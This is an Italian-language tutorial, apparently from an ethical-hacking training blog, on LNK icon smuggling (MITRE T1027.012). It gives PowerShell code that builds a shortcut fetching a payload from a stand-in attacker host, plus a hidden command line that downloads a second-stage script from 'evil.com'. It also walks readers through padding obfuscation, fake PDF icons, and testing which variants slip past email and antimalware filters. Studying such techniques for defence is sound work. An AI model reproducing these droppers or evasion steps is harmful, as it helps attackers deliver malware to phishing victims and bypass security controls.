LNK Icon Smuggling: Obfuscated Files or Information: LNK Icon Smuggling (T1027.012)
I file di collegamento Windows (.LNK) nascondono una capacità insidiosa: il campo IconEnvironmentDataBlock può trasformarsi in un veicolo per scaricare payload malevoli aggirando i filtri di contenuto. Questa tecnica appartiene alla tattica TA0005 (Defense Evasion), manifestandosi durante la fase di evasione delle difese nella kill chain.
Gli attaccanti abusano dei metadati LNK per mascherare comandi di download all'interno di file apparentemente innocui. Una volta invocato il file LNK, il payload referenziato tramite URL esterni nel campo icon location viene scaricato silenziosamente. La tecnica può essere utilizzata sia in fase di compromissione iniziale tramite phishing, sia post-compromissione per scaricare ulteriori payload.
Attualmente 3 gruppi APT hanno dimostrato l'utilizzo operativo di questa tecnica, insieme a 1 malware documentato. L'efficacia risiede nella sua semplicità: sfrutta una funzionalità legittima di Windows per nascondere attività malevole.
Creare un file LNK malevolo richiede manipolazione precisa dei metadati. Su Windows, puoi utilizzare PowerShell per generare un LNK che nasconde un URL nel campo icon:
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Document.lnk")
$Shortcut.IconLocation = "http://attacker.com/payload.exe"
$Shortcut.Save()
Il vero trucco sta nel mascherare l'esecuzione. Gamaredon Group ha dimostrato come nascondere script malevoli all'interno di LNK utilizzando padding e offuscamento. Puoi replicare questa tecnica aggiungendo spazi extra nel campo target per oscurare lo script:
$Shortcut.TargetPath = "C:\Windows\System32\cmd.exe /c powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://evil.com/stage2.ps1','%TEMP%\update.ps1')"
Per aumentare la credibilità, Mustang Panda programma i file LNK per mostrare icone PDF. Questo inganna le vittime facendole cliccare su quello che sembra un documento legittimo. La combinazione di icona familiare e nome file convincente aumenta drasticamente il tasso di successo.
In laboratorio, crea diversi template LNK con varie tecniche di offuscamento. Testa l'evasione dei filtri email popolari inviando i file attraverso diversi provider. Monitora quali varianti superano i controlli antimalware standard.
L'esecuzione post-compromissione offre ulteriori opportunità. Script malevoli possono generare dinamicamente file LNK sul sistema compromesso per scaricare tool aggiuntivi mantenendo un profilo basso.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo